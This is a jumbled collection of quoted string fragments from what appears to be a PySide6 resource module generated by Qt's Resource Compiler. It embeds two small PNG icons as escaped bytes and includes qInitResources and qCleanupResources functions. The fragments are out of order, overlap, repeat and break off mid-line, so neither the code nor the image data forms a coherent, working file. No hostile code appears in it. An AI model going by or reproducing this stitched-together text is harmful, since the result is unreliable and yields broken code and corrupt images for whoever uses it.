"\\x07\\x90\\xdd\\xa7\\ \\x00o\\ \\x00p\\x00e\\x00n\\x00p\\x00r\\x00o\\x00j\\x00.\\x00p\\x00n\\x00g\\ \" qt_resource_struct = b\"\\ \\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\ \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\ \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x00,\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x03q\\ \\x00\\x00\\x01}\\xe0D>B\\",
"\\x1f\\xbc\\xf82\\xecq\\x8b\\x81\\xbd;\\xfckL\\x0a\\xb2M\\ \\x1d0\\xc1A\\x0d\\x1c\\xa0\\xd4\\x82|^\\x023\\x9f/\\x5c\\ QB!\\xc27&\\xa2R\\xc0_VV[U\\xea\\x8b\\ \\xccgVY9\\xa3\\xb5sg\\xa0L\\xd7lQ\\x94\\x80\\ }\\x8e%\\xbeEb?\\x93z\\x96\\x9a=\\xdd\\xcd\\xc1\\x1b\\ \\xf7>\\xbeFA/\\x88\\xb2|Wh;\\xfb\\x81\\xeb\\xb0\\ \\x11\\xdfzhU\\xa5k\\xbb\\xb6\\x9c9\\xd6\\xd2T[\\xa9\\ *\\xaab3\\xcby\\xfb)6\\xbb\\x94\\xcc>\\x12\\x08\\x19\\ \\xc1\\x0a]\\xe6\\xa7\\xf2`YUC\\x92\\xa2\\x80\\x94I&\\ -\\xf4\\x85\\xd1;\\x9aNX\\xe3~\\x7fEI\\x9c\\x09J\\ &\\xa5A6\\xb6\\x90\\x89\\xc7\\xb50\\x91\\xa4A\\x0c\\xb6\\x91\\ w\\x0e\\xd1\\x80\\x87\\x85h.\\x07\\x1c$\\x9dL*\\x88\\xed\\ Z*uQ)\\x11\\x1b\\xf4\\xba:\\xcf$UA7(\\",
"ImageRead\\ yq\\xc9e<\\x00\\x00\\x03\\x0fIDATx\\xda\\x8c\\ S[k\\x13A\\x14>;{K\\xd3&\\xbd\\xc4Vk\\ \\xbc\\xa4\\x17\\xac\\xb4\\xd6V#R+j\\xa5*\\x0aZh\\ \\xc1\\xe2\\x83\\x0f>\\xf5A,\\x14\\xfa'\\x04\\x1f\\x14\\x04\\xa1\\ \\x05\\x8b`|T\\xa1*\\xa8\\xf5\\x8a (j\\xbd\\xd2\\x0b\\ \\x8dI\\x89\\xb76ib\\x93\\xddl2\\xbb;\\xeb\\x99\\x90\\ *\\xfa\\xe4\\xc0\\xb7s8\\xfb\\x9d33\\xdf9G\\xe8\\x1a\\ [\\x00\\x10\\x04XY\\x0ec`\\xdb6\\x18\\x9a\\x06\\x92,\\ \\x03\\x11\\xc5\\x82_QU\\xa4\\x09#h>\\xb3,+d\\ \\x99&X\\x94\\x82\\x04\\xff\\xb9L\\x0c \\x84\\x04\\xd1\\x0c\\x16\\",
"object code (Python 3) # Created by: object code # Created by: The",
"= b\"\\ \\x00\\x05\\ \\x00o\\xa6S\\ \\x00i\\ \\x00c\\x00o\\x00n\\x00s\\ \\x00\\x0b\\ \\x0d\\xd7\\xa0\\xc7\\ \\x00s\\ \\x00h\\x00u\\x00f\\x00f\\x00l\\x00e\\x00.\\x00p\\x00n\\x00g\\ \\x00\\x0c\\ \\x07\\x90\\xdd\\xa7\\ \\x00o\\",
"yq\\xc9e<\\x00\\x00\\x02}IDATx\\xda\\x8c\\ \\x93\\xdfK\\x93Q\\x18\\xc7\\xbf\\xef\\xd9\\xd9t3s\\xad\\x9c\\ LG\\xcd\\xb5i\\x18\\x85\\x91\\xd4\\x8d\\x10\\x98AR\\x17A\\ ^ue\\x17\\x15A\\x7fB\\x16DPDw]G\\xd7\\ F\\x91A\\xdeu\\x11\\x95\\x11\\x1a\\x94\\x09\\x22-\\x86\\xe9\\x9c\\ ,$+u\\x93\\xf7=?z\\xce\\xd9\\xa6.\\x08:p\\ 8\\xcf\\xf9\\xf1|\\xdf\\xcf\\xf7<\\xefq&\\xef\\xc06\\xc7\\ \\xc1E\\x1a\\x12\\xf8\\xbf6\\xa75\\x1e\\xdd\\xdb\\xb8\\x09\\xae+\\ +\\xb4\\x90\\xec\\x1a\\xbc{}=?\\x0bGi\\x84\\xf6\\xb4\\ #\\x18\\x8e\\x83\\xf9\\x02\\xb5\\xa9\\x9cc\\xf2\\xe1\\x85\\xdb#\\xee\\ Py\\xaa\\xd4\\xe6\\x16k\\x88\\xa6)q?\\xdc\\xd5\\x02\\xd6\\ \\xf3_0\\xfe\\xf6\\x0d\\x9c\\xc4\\x99\\x9a|\\xc7\\xef\\xc7\\x07\\xef\\ \\xf4\\xd1y\\xb5\\xef2M\\x97\\xb8\\xd4[\\x02J\\x0ah\\xcf\\",
"\\xa7\\x0e\\x03\\x83\\xc7q\\x8e\\xde\\xd1@$\\x1a\\xefL\\x1d<\\ \\x96x\\xfcl\\x8c=\\x98\\xda\\xfb\\x9c\\x05\\x02%\\x871\\xf9\\ \\xf7\\x93T\\xc5\\xe2\\x02\\xafY\\xd0\\x18\\xa5\\xaa\\x8c.\\xe6r\\ \\xdd\\x0b\\xf3\\xb9\\xb3\\x8d\\x1c\\xb1b&s\\x9f\\xb6\\xbc\\x7f<\\ \\xeb\\xd2\\x1f\\x01\\x06\\x00\\xd2\\x97^|\\x9f\\xc2\\xaf\\xc8\\x00\\x00\\ \\x00\\x00IEND\\xaeB`\\x82\\ \" qt_resource_name = b\"\\ \\x00\\x05\\ \\x00o\\xa6S\\ \\x00i\\",
"object code # Created by: The Resource Compiler for Qt version 6.2.2 #",
"*\\xfa\\xe4\\xc0\\xb7s8\\xfb\\x9d33\\xdf9G\\xe8\\x1a\\ [\\x00\\x10\\x04XY\\x0ec`\\xdb6\\x18\\x9a\\x06\\x92,\\ \\x03\\x11\\xc5\\x82_QU\\xa4\\x09#h>\\xb3,+d\\ \\x99&X\\x94\\x82\\x04\\xff\\xb9L\\x0c \\x84\\x04\\xd1\\x0c\\x16\\ ]!\\xfe\\xe1\\x09\\xce\\x80\\xe3\\xd4\\xe1\\x9eFD\\x10\\xcf\\x11\\ sER\\xd0q\\x9c>\\xdc\\xb7:\\xb6]\\xc3\\xf0f\\xbd\\ ]\\xeb\\x827\\x9f|\\x19\\xc2\\x98B\\x12\\x09\\xaf\\xd3p\\xfc\\ @m}Z\\xb7\\xcd\\xef\\x89\\x5c\\xfd\\xcc\\xbc\\xb6\\x03y\\x0f\\ \\x91\\x10\\x10\\x05v\\xaa\\xb9\\xde[\\xb3\\xda\\xe7.w)\\xa2\\ K\\x00AL$(\\x1c\\xe9X\\x13\\x1c\\x7f:?\\x84\\x09\\ \\x12\\x12\\x7f\\x0b*@\\x1c\\x13T\\x9f[Q\\xf7\\xb4Vz\\ \\x1f\\xbc\\xf82\\xecq\\x8b\\x81\\xbd;\\xfckL\\x0a\\xb2M\\",
"0%\\xcb\\x16\\x0a\\xf8J\\x14\\xa6Mg\\xb3\\xf8D\\x14U\\ \\x01\\xb7T\\xaa\\xe3\\x14\\xd7S\\x8fL\\xcd!\\x9fz\\xf5t\\ 5q\\xa0\\xa7\\xbeiw\\xccoJ\\xd7\\xecW\\x8867\\ \\xdb\\x84\\x16\\xb2P\\xf3$\\xe8\\x97^Y^np\\xaa\\x0b\\ \\xa7\\x0e\\x03\\x83\\xc7q\\x8e\\xde\\xd1@$\\x1a\\xefL\\x1d<\\ \\x96x\\xfcl\\x8c=\\x98\\xda\\xfb\\x9c\\x05\\x02%\\x871\\xf9\\ \\xf7\\x93T\\xc5\\xe2\\x02\\xafY\\xd0\\x18\\xa5\\xaa\\x8c.\\xe6r\\ \\xdd\\x0b\\xf3\\xb9\\xb3\\x8d\\x1c\\xb1b&s\\x9f\\xb6\\xbc\\x7f<\\ \\xeb\\xd2\\x1f\\x01\\x06\\x00\\xd2\\x97^|\\x9f\\xc2\\xaf\\xc8\\x00\\x00\\ \\x00\\x00IEND\\xaeB`\\x82\\ \" qt_resource_name =",
"6h\\x199\\xb6\\xaf\\x7fwcx2\\xcc\\x93P\\xc6X\\ T(=q\\xf5\\xd5\\x91\\xd3\\xfd\\xc1\\xdbi\\x05L,m\\ \\xb5m\\x98t\\xe2\\xd1\\x0f\\x82?\\xd5\\xc3\\x07\\x96\\x16\\x05\\x97\\ D\\xb0L\\x1e\\x19\\xc0\\x8bjEu\\x80m\\x15\\x00\\xb1k\\ \\xb7\\xe6\\x0a}`b;N\\xe7\\xf1\\x08=\\x99g\\x91\\xe8\\ \\xcf\\xe5wS\\x8b\\x8c\\xd2+n\\x8f'\\x9a\\xbds\\xbf\\xdb\\ \\xd7\\xd4Xn\\xae\\xf5\\xbb-O\\x99\\x92#\\x12a\\x98\\xcc\\ `\\x00\\xb4XFA\\xec\\x19\\x19\\xc1\\xeb\\xb4\\xa3\\x1dG\\xbc\\ G\\x85\\xaf\\x93T\\xf8\\xb5\\xea.\\x01\\xf0mjD\\xf1v\\ \\xa1\\x9f\\xbf\\xbf\\x1cA\\xd6\\x0f\\x9cl\\x8c\\x8d\\x86\\xe6\\x907\\ \\x8e\\xe2>\\x16\\x84\\xa6\\xa38A\\x7fz\\xde\\x99\\xbd\\xfd\\xd7\\ \\x0c\\xc8-\\xbd\\xbfm\\xe4\\x9e/p\\x123\\xe3l\\xfa\\xd6\\ c{q\\x8a7a\\x012\\x1f8\\x84\\xab\\x08\\xb5\\xb8s\\",
"@m}Z\\xb7\\xcd\\xef\\x89\\x5c\\xfd\\xcc\\xbc\\xb6\\x03y\\x0f\\ \\x91\\x10\\x10\\x05v\\xaa\\xb9\\xde[\\xb3\\xda\\xe7.w)\\xa2\\ K\\x00AL$(\\x1c\\xe9X\\x13\\x1c\\x7f:?\\x84\\x09\\ \\x12\\x12\\x7f\\x0b*@\\x1c\\x13T\\x9f[Q\\xf7\\xb4Vz\\ \\x1f\\xbc\\xf82\\xecq\\x8b\\x81\\xbd;\\xfckL\\x0a\\xb2M\\ \\x1d0\\xc1A\\x0d\\x1c\\xa0\\xd4\\x82|^\\x023\\x9f/\\x5c\\ QB!\\xc27&\\xa2R\\xc0_VV[U\\xea\\x8b\\ \\xccgVY9\\xa3\\xb5sg\\xa0L\\xd7lQ\\x94\\x80\\ }\\x8e%\\xbeEb?\\x93z\\x96\\x9a=\\xdd\\xcd\\xc1\\x1b\\ \\xf7>\\xbeFA/\\x88\\xb2|Wh;\\xfb\\x81\\xeb\\xb0\\ \\x11\\xdfzhU\\xa5k\\xbb\\xb6\\x9c9\\xd6\\xd2T[\\xa9\\ *\\xaab3\\xcby\\xfb)6\\xbb\\x94\\xcc>\\x12\\x08\\x19\\ \\xc1\\x0a]\\xe6\\xa7\\xf2`YUC\\x92\\xa2\\x80\\x94I&\\",
"yq\\xc9e<\\x00\\x00\\x03\\x0fIDATx\\xda\\x8c\\ S[k\\x13A\\x14>;{K\\xd3&\\xbd\\xc4Vk\\ \\xbc\\xa4\\x17\\xac\\xb4\\xd6V#R+j\\xa5*\\x0aZh\\ \\xc1\\xe2\\x83\\x0f>\\xf5A,\\x14\\xfa'\\x04\\x1f\\x14\\x04\\xa1\\ \\x05\\x8b`|T\\xa1*\\xa8\\xf5\\x8a (j\\xbd\\xd2\\x0b\\ \\x8dI\\x89\\xb76ib\\x93\\xddl2\\xbb;\\xeb\\x99\\x90\\ *\\xfa\\xe4\\xc0\\xb7s8\\xfb\\x9d33\\xdf9G\\xe8\\x1a\\ [\\x00\\x10\\x04XY\\x0ec`\\xdb6\\x18\\x9a\\x06\\x92,\\ \\x03\\x11\\xc5\\x82_QU\\xa4\\x09#h>\\xb3,+d\\ \\x99&X\\x94\\x82\\x04\\xff\\xb9L\\x0c \\x84\\x04\\xd1\\x0c\\x16\\ ]!\\xfe\\xe1\\x09\\xce\\x80\\xe3\\xd4\\xe1\\x9eFD\\x10\\xcf\\x11\\",
"\\xf1\\xf2\\x83nl\\xda<-\\x06\\xd6I.\\xc1\\xae\\xa2Z\\ 6h\\x199\\xb6\\xaf\\x7fwcx2\\xcc\\x93P\\xc6X\\ T(=q\\xf5\\xd5\\x91\\xd3\\xfd\\xc1\\xdbi\\x05L,m\\ \\xb5m\\x98t\\xe2\\xd1\\x0f\\x82?\\xd5\\xc3\\x07\\x96\\x16\\x05\\x97\\ D\\xb0L\\x1e\\x19\\xc0\\x8bjEu\\x80m\\x15\\x00\\xb1k\\ \\xb7\\xe6\\x0a}`b;N\\xe7\\xf1\\x08=\\x99g\\x91\\xe8\\ \\xcf\\xe5wS\\x8b\\x8c\\xd2+n\\x8f'\\x9a\\xbds\\xbf\\xdb\\ \\xd7\\xd4Xn\\xae\\xf5\\xbb-O\\x99\\x92#\\x12a\\x98\\xcc\\ `\\x00\\xb4XFA\\xec\\x19\\x19\\xc1\\xeb\\xb4\\xa3\\x1dG\\xbc\\ G\\x85\\xaf\\x93T\\xf8\\xb5\\xea.\\x01\\xf0mjD\\xf1v\\ \\xa1\\x9f\\xbf\\xbf\\x1cA\\xd6\\x0f\\x9cl\\x8c\\x8d\\x86\\xe6\\x907\\ \\x8e\\xe2>\\x16\\x84\\xa6\\xa38A\\x7fz\\xde\\x99\\xbd\\xfd\\xd7\\ \\x0c\\xc8-\\xbd\\xbfm\\xe4\\x9e/p\\x123\\xe3l\\xfa\\xd6\\",
">o\\x85b\\xb1\\x18>f2\\x9b\\x04\\xa6\\x22\\x1e\\x09\\xb0\\ \\x1b#\\x80\\x11\\xf1\\x04\\x02\\xcaZ\\xf0*\\xdd\\xc4\\x0a\\xc9\\x96\\ \\x16\\xa4\\x88b\\xc3uq(\\x99Dw\\x85\\xc2\\x10X\\x01\\ \\x8a\\x83\\xb7\\x9e \\xf2\\xbb\\x84\\x9d\\x9a\\x12\\x94-e\\xf9\\x7f\\ 0%\\xcb\\x16\\x0a\\xf8J\\x14\\xa6Mg\\xb3\\xf8D\\x14U\\ \\x01\\xb7T\\xaa\\xe3\\x14\\xd7S\\x8fL\\xcd!\\x9fz\\xf5t\\ 5q\\xa0\\xa7\\xbeiw\\xccoJ\\xd7\\xecW\\x8867\\ \\xdb\\x84\\x16\\xb2P\\xf3$\\xe8\\x97^Y^np\\xaa\\x0b\\ \\xa7\\x0e\\x03\\x83\\xc7q\\x8e\\xde\\xd1@$\\x1a\\xefL\\x1d<\\ \\x96x\\xfcl\\x8c=\\x98\\xda\\xfb\\x9c\\x05\\x02%\\x871\\xf9\\ \\xf7\\x93T\\xc5\\xe2\\x02\\xafY\\xd0\\x18\\xa5\\xaa\\x8c.\\xe6r\\ \\xdd\\x0b\\xf3\\xb9\\xb3\\x8d\\x1c\\xb1b&s\\x9f\\xb6\\xbc\\x7f<\\",
"Created by: The Resource Compiler for Qt version 6.2.2 # WARNING! All changes",
"Z*uQ)\\x11\\x1b\\xf4\\xba:\\xcf$UA7(\\ ]H\\xe9Y\\xaf\\xcf\\xfb\\x15\\x83\\x060\\x9eW\\xaa\\x03Q\\ \\x8d\\x09\\xf6S\\xc3\\x00}y\\x19DyK\\xdf%\\xaf\\xa7\\ d\\xb0\\xbaiC[\\xba\\xbd=\\x10a.REL;\\ \\xf1\\xf2\\x83nl\\xda<-\\x06\\xd6I.\\xc1\\xae\\xa2Z\\ 6h\\x199\\xb6\\xaf\\x7fwcx2\\xcc\\x93P\\xc6X\\ T(=q\\xf5\\xd5\\x91\\xd3\\xfd\\xc1\\xdbi\\x05L,m\\ \\xb5m\\x98t\\xe2\\xd1\\x0f\\x82?\\xd5\\xc3\\x07\\x96\\x16\\x05\\x97\\ D\\xb0L\\x1e\\x19\\xc0\\x8bjEu\\x80m\\x15\\x00\\xb1k\\ \\xb7\\xe6\\x0a}`b;N\\xe7\\xf1\\x08=\\x99g\\x91\\xe8\\ \\xcf\\xe5wS\\x8b\\x8c\\xd2+n\\x8f'\\x9a\\xbds\\xbf\\xdb\\ \\xd7\\xd4Xn\\xae\\xf5\\xbb-O\\x99\\x92#\\x12a\\x98\\xcc\\ `\\x00\\xb4XFA\\xec\\x19\\x19\\xc1\\xeb\\xb4\\xa3\\x1dG\\xbc\\",
"b\"\\ \\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\ \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\ \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x00,\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x03q\\ \\x00\\x00\\x01}\\xe0D>B\\ \\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x01}\\xe0D>B\\ \" def qInitResources(): QtCore.qRegisterResourceData(0x03,",
"w\\x0e\\xd1\\x80\\x87\\x85h.\\x07\\x1c$\\x9dL*\\x88\\xed\\ Z*uQ)\\x11\\x1b\\xf4\\xba:\\xcf$UA7(\\ ]H\\xe9Y\\xaf\\xcf\\xfb\\x15\\x83\\x060\\x9eW\\xaa\\x03Q\\ \\x8d\\x09\\xf6S\\xc3\\x00}y\\x19DyK\\xdf%\\xaf\\xa7\\ d\\xb0\\xbaiC[\\xba\\xbd=\\x10a.REL;\\ \\xf1\\xf2\\x83nl\\xda<-\\x06\\xd6I.\\xc1\\xae\\xa2Z\\ 6h\\x199\\xb6\\xaf\\x7fwcx2\\xcc\\x93P\\xc6X\\ T(=q\\xf5\\xd5\\x91\\xd3\\xfd\\xc1\\xdbi\\x05L,m\\ \\xb5m\\x98t\\xe2\\xd1\\x0f\\x82?\\xd5\\xc3\\x07\\x96\\x16\\x05\\x97\\ D\\xb0L\\x1e\\x19\\xc0\\x8bjEu\\x80m\\x15\\x00\\xb1k\\ \\xb7\\xe6\\x0a}`b;N\\xe7\\xf1\\x08=\\x99g\\x91\\xe8\\ \\xcf\\xe5wS\\x8b\\x8c\\xd2+n\\x8f'\\x9a\\xbds\\xbf\\xdb\\ \\xd7\\xd4Xn\\xae\\xf5\\xbb-O\\x99\\x92#\\x12a\\x98\\xcc\\",
"\\xdd\\x0b\\xf3\\xb9\\xb3\\x8d\\x1c\\xb1b&s\\x9f\\xb6\\xbc\\x7f<\\ \\xeb\\xd2\\x1f\\x01\\x06\\x00\\xd2\\x97^|\\x9f\\xc2\\xaf\\xc8\\x00\\x00\\ \\x00\\x00IEND\\xaeB`\\x82\\ \" qt_resource_name = b\"\\ \\x00\\x05\\ \\x00o\\xa6S\\ \\x00i\\ \\x00c\\x00o\\x00n\\x00s\\ \\x00\\x0b\\ \\x0d\\xd7\\xa0\\xc7\\",
"qt_resource_struct = b\"\\ \\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\ \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\ \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x00,\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x03q\\ \\x00\\x00\\x01}\\xe0D>B\\ \\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x01}\\xe0D>B\\ \" def",
"\\x8a\\x83\\xb7\\x9e \\xf2\\xbb\\x84\\x9d\\x9a\\x12\\x94-e\\xf9\\x7f\\ 0%\\xcb\\x16\\x0a\\xf8J\\x14\\xa6Mg\\xb3\\xf8D\\x14U\\ \\x01\\xb7T\\xaa\\xe3\\x14\\xd7S\\x8fL\\xcd!\\x9fz\\xf5t\\ 5q\\xa0\\xa7\\xbeiw\\xccoJ\\xd7\\xecW\\x8867\\ \\xdb\\x84\\x16\\xb2P\\xf3$\\xe8\\x97^Y^np\\xaa\\x0b\\ \\xa7\\x0e\\x03\\x83\\xc7q\\x8e\\xde\\xd1@$\\x1a\\xefL\\x1d<\\ \\x96x\\xfcl\\x8c=\\x98\\xda\\xfb\\x9c\\x05\\x02%\\x871\\xf9\\ \\xf7\\x93T\\xc5\\xe2\\x02\\xafY\\xd0\\x18\\xa5\\xaa\\x8c.\\xe6r\\ \\xdd\\x0b\\xf3\\xb9\\xb3\\x8d\\x1c\\xb1b&s\\x9f\\xb6\\xbc\\x7f<\\ \\xeb\\xd2\\x1f\\x01\\x06\\x00\\xd2\\x97^|\\x9f\\xc2\\xaf\\xc8\\x00\\x00\\ \\x00\\x00IEND\\xaeB`\\x82\\ \"",
"\\xf7\\x93T\\xc5\\xe2\\x02\\xafY\\xd0\\x18\\xa5\\xaa\\x8c.\\xe6r\\ \\xdd\\x0b\\xf3\\xb9\\xb3\\x8d\\x1c\\xb1b&s\\x9f\\xb6\\xbc\\x7f<\\ \\xeb\\xd2\\x1f\\x01\\x06\\x00\\xd2\\x97^|\\x9f\\xc2\\xaf\\xc8\\x00\\x00\\ \\x00\\x00IEND\\xaeB`\\x82\\ \" qt_resource_name = b\"\\ \\x00\\x05\\ \\x00o\\xa6S\\ \\x00i\\ \\x00c\\x00o\\x00n\\x00s\\ \\x00\\x0b\\",
"!\\x84\\xc3\\xc56\\x02%=H\\xe1U\\x0c9h\\xd0.\\ \\xd6\\x96V\\xa0\\xe9p\\x7f\\x84C\\x16\\x94%\\xec\\x0f\\x92\\x90\\ \\xdea\\x04\\xd8v\\x0b\\x5c\\x09\\x22\\x10e\\x02\\x87\\xf9\\x10T\\ .\\xae\\xa4\\x1a\\xed|qm\\x05=\\x1d\\x1d6\\x1e\\x9f\\x9e\\ &\\x818\\x84\\xe71.j,\\x88-\\x0b\\xd2G\\xb8\\x02\\ 3\\xb9\\x9c\\xf1\\x8a\\xb6\\xb66L\\xcc\\xce\\xda;\\xb0Wd\\ ,X\\x81\\x1a\\x02\\x0f\\xaabA\\x99;\\xa0\\xc3\\xe9\\xd6V\\ ;\\xff^,\\xe2H:m\\xe3\\x89\\x99\\x19\\x22\\xd0e\\x81\\ \\xcf\\xdf\\x80\\xaex\\xe5\\x0e\\x08_\\x8a\\xea%\\xfa\\xac\\x9dL\\ >o\\x85b\\xb1\\x18>f2\\x9b\\x04\\xa6\\x22\\x1e\\x09\\xb0\\ \\x1b#\\x80\\x11\\xf1\\x04\\x02\\xcaZ\\xf0*\\xdd\\xc4\\x0a\\xc9\\x96\\ \\x16\\xa4\\x88b\\xc3uq(\\x99Dw\\x85\\xc2\\x10X\\x01\\ \\x8a\\x83\\xb7\\x9e",
"\\xd7\\xd4Xn\\xae\\xf5\\xbb-O\\x99\\x92#\\x12a\\x98\\xcc\\ `\\x00\\xb4XFA\\xec\\x19\\x19\\xc1\\xeb\\xb4\\xa3\\x1dG\\xbc\\ G\\x85\\xaf\\x93T\\xf8\\xb5\\xea.\\x01\\xf0mjD\\xf1v\\ \\xa1\\x9f\\xbf\\xbf\\x1cA\\xd6\\x0f\\x9cl\\x8c\\x8d\\x86\\xe6\\x907\\ \\x8e\\xe2>\\x16\\x84\\xa6\\xa38A\\x7fz\\xde\\x99\\xbd\\xfd\\xd7\\ \\x0c\\xc8-\\xbd\\xbfm\\xe4\\x9e/p\\x123\\xe3l\\xfa\\xd6\\ c{q\\x8a7a\\x012\\x1f8\\x84\\xab\\x08\\xb5\\xb8s\\ \\xbf\\xb8\\x92\\x80t\\x0e\\x1f\\x84\\x5cj\\x96\\xbd\\x19\\xe3\\xf3\\x92\\ A\\x18+\\x09H\\x91(\\xfd\\x03R\\xc4\\xcab|0\\x11\\ \\x5c\\x00\\xca\\xed_\\x02\\x0c\\x00\\xa6=o\\xdb2\\xe1%J\\ \\x00\\x00\\x00\\x00IEND\\xaeB`\\x82\\ \\x00\\x00\\x02\\xdb\\ \\x89\\",
"\\xc1E\\x1a\\x12\\xf8\\xbf6\\xa75\\x1e\\xdd\\xdb\\xb8\\x09\\xae+\\ +\\xb4\\x90\\xec\\x1a\\xbc{}=?\\x0bGi\\x84\\xf6\\xb4\\ #\\x18\\x8e\\x83\\xf9\\x02\\xb5\\xa9\\x9cc\\xf2\\xe1\\x85\\xdb#\\xee\\ Py\\xaa\\xd4\\xe6\\x16k\\x88\\xa6)q?\\xdc\\xd5\\x02\\xd6\\ \\xf3_0\\xfe\\xf6\\x0d\\x9c\\xc4\\x99\\x9a|\\xc7\\xef\\xc7\\x07\\xef\\ \\xf4\\xd1y\\xb5\\xef2M\\x97\\xb8\\xd4[\\x02J\\x0ah\\xcf\\ \\x03\\xaf\\x0b#\\xdc\\xd9\\x8bX\\xc1A{\\xef%\\x84B!\\ 0\\xc66\\x0f\\xf6\\x9f\\xbc6@\\xc3\\xc0\\xf9\\xe1\\xe1\\xab\\x5c\\ n\\x11\\xf8\\xb4\\x940\\xdd6!\\xf0b\\xa9\\x84\\xb1\\xd7?\\ \\xa1\\xd4\\x0f\\xf0]QH\\xc2\\x95\\xb4\\xafh|\\xdf\\xd7\\x04\\ %\\xa5\\xc3\\xab\\xe7\\xab\\x02\\x86\\xc2\\xe2\\xd0\\x17\\xd5\\xc6:N\\ \\xb43J\\xd2x\\xf7\\x0b\\xe8K\\x18\\x01\\x85\\x97YX\\x11\\ !\\x84\\xc3\\xc56\\x02%=H\\xe1U\\x0c9h\\xd0.\\",
"\\x1b#\\x80\\x11\\xf1\\x04\\x02\\xcaZ\\xf0*\\xdd\\xc4\\x0a\\xc9\\x96\\ \\x16\\xa4\\x88b\\xc3uq(\\x99Dw\\x85\\xc2\\x10X\\x01\\ \\x8a\\x83\\xb7\\x9e \\xf2\\xbb\\x84\\x9d\\x9a\\x12\\x94-e\\xf9\\x7f\\ 0%\\xcb\\x16\\x0a\\xf8J\\x14\\xa6Mg\\xb3\\xf8D\\x14U\\ \\x01\\xb7T\\xaa\\xe3\\x14\\xd7S\\x8fL\\xcd!\\x9fz\\xf5t\\ 5q\\xa0\\xa7\\xbeiw\\xccoJ\\xd7\\xecW\\x8867\\ \\xdb\\x84\\x16\\xb2P\\xf3$\\xe8\\x97^Y^np\\xaa\\x0b\\ \\xa7\\x0e\\x03\\x83\\xc7q\\x8e\\xde\\xd1@$\\x1a\\xefL\\x1d<\\ \\x96x\\xfcl\\x8c=\\x98\\xda\\xfb\\x9c\\x05\\x02%\\x871\\xf9\\ \\xf7\\x93T\\xc5\\xe2\\x02\\xafY\\xd0\\x18\\xa5\\xaa\\x8c.\\xe6r\\ \\xdd\\x0b\\xf3\\xb9\\xb3\\x8d\\x1c\\xb1b&s\\x9f\\xb6\\xbc\\x7f<\\ \\xeb\\xd2\\x1f\\x01\\x06\\x00\\xd2\\x97^|\\x9f\\xc2\\xaf\\xc8\\x00\\x00\\",
"be lost! from PySide6 import QtCore qt_resource_data = b\"\\ \\x00\\x00\\x03m\\ \\x89\\ PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\ \\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\",
"\\x00\\x00\\x01}\\xe0D>B\\ \" def qInitResources(): QtCore.qRegisterResourceData(0x03, qt_resource_struct, qt_resource_name, qt_resource_data) def qCleanupResources(): QtCore.qUnregisterResourceData(0x03, qt_resource_struct, qt_resource_name,",
"qt_resource_name = b\"\\ \\x00\\x05\\ \\x00o\\xa6S\\ \\x00i\\ \\x00c\\x00o\\x00n\\x00s\\ \\x00\\x0b\\ \\x0d\\xd7\\xa0\\xc7\\ \\x00s\\ \\x00h\\x00u\\x00f\\x00f\\x00l\\x00e\\x00.\\x00p\\x00n\\x00g\\ \\x00\\x0c\\ \\x07\\x90\\xdd\\xa7\\",
"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x00,\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x03q\\ \\x00\\x00\\x01}\\xe0D>B\\ \\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x01}\\xe0D>B\\ \" def qInitResources(): QtCore.qRegisterResourceData(0x03, qt_resource_struct, qt_resource_name, qt_resource_data) def",
"\\x5c\\x00\\xca\\xed_\\x02\\x0c\\x00\\xa6=o\\xdb2\\xe1%J\\ \\x00\\x00\\x00\\x00IEND\\xaeB`\\x82\\ \\x00\\x00\\x02\\xdb\\ \\x89\\ PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\ \\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\ \\x00\\x00\\x00\\x19tEXtSoftware\\ \\x00Adobe ImageRead\\ yq\\xc9e<\\x00\\x00\\x02}IDATx\\xda\\x8c\\ \\x93\\xdfK\\x93Q\\x18\\xc7\\xbf\\xef\\xd9\\xd9t3s\\xad\\x9c\\ LG\\xcd\\xb5i\\x18\\x85\\x91\\xd4\\x8d\\x10\\x98AR\\x17A\\ ^ue\\x17\\x15A\\x7fB\\x16DPDw]G\\xd7\\",
"lost! from PySide6 import QtCore qt_resource_data = b\"\\ \\x00\\x00\\x03m\\ \\x89\\ PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\ \\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\ \\x00\\x00\\x00\\x19tEXtSoftware\\",
